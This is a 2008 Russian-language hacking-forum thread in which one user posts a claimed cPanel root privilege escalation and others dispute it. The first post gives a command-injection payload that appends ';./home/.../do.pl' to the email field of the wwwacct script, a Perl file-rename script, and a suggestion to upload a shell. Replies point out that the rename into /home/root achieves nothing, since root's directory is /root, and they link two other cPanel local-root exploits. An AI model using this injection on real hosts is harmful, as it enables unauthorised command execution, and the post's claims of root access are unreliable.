Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   Cpanel all versions. (https://forum.antichat.xyz/showthread.php?t=74286)

КВР 19.06.2008 20:11

Cpanel all versions.
 
Cpanel



Версия:
все

риск: очень высокий

Этот баг может привести к поднятию привелегий до рута

Cpanel самоя распространенная у хостеров предоставляющие площадки под сайт

официальный сайт: Cpanel.net

[code]

Как это работает?

Что происходит когда ты создаёш аккаунт ?

./script/wwwact [domainname] [username] [password] [Email address] lab lab lab

Далее ты можеш запусьтить саму программу ! ( cpanel : doamin:2086)

К примеру:

http://domain:2086/scripts/wwwacct [domainname] [username] [password] [Email address] lab lab lab

iЕсли запрос прошол значит у вас есть доступ к деректории скрипта (Th3 r00t)

так ты можеш выполнять любые команды, к примеру

./scripts/wwwactt domain.com domain password (at) (dot) ir [email concealed];./home/public_html/do.pl ( your command now is ./home/hackerz/public_html/do.pl)


()()()()()()()()()()()()()

Проверим:

++++++++++++++++++++++++++

Шаг первый

сохроните в фаил /home/user/public_html/do.pl .

#!/usr/bin/perl

$old='/home/user/public_html/test.txt';

$new='/home/root/kon.txt';

rename $old, $new;

++++++++++++++++++++++++++

Шаг второй

пазовите фаил test.txt в твоей public_html директории.

path will be : /home/user/public_html/test.txt .

++++++++++++++++++++++++++

Шаг третий

создайте аккаунт с следушей командой: (at) (dot) ir [email concealed];./home/user/public_html/do.pl in E-mail Address text box

и нажмите нопку создать.

Теперь ты сможеш видеть /home/root/ .

++++++++++++++++++++++++++

()()()()()()()()()()()()()

Ты можеш выполнить и ваш собственный код !Залить шелл и тп.

gisTy 04.07.2008 19:01

эээ... ты просто переименовал каталог... а рутовый каталог вообще то находится по адресу /root
а "багу" ты сам нашел? или взял откуда то? потому что то что ты тут описал тебе абсолютно не даст...

otmorozok428 05.07.2008 16:39

Сам понял, чего написал-то? :eek: Я знаю две local root уязвимости для CPanel:

http://www.milw0rm.com/exploits/2466

http://www.milw0rm.com/exploits/2554

Но это по-ходу не они...

КВР, ответь на вопрос: у тебя самого это где-нибудь работало? :confused:

gisTy 05.07.2008 17:02

ты посмотри что он делает.. он переименовывает каталог из /home/user в /home/root.. это ему ничего не даст так как рутовый каталог лежит по адресу /root а не /home/root.. поэтому все что тут описано на мой взгляд является полнейшим бредом


Время: 21:16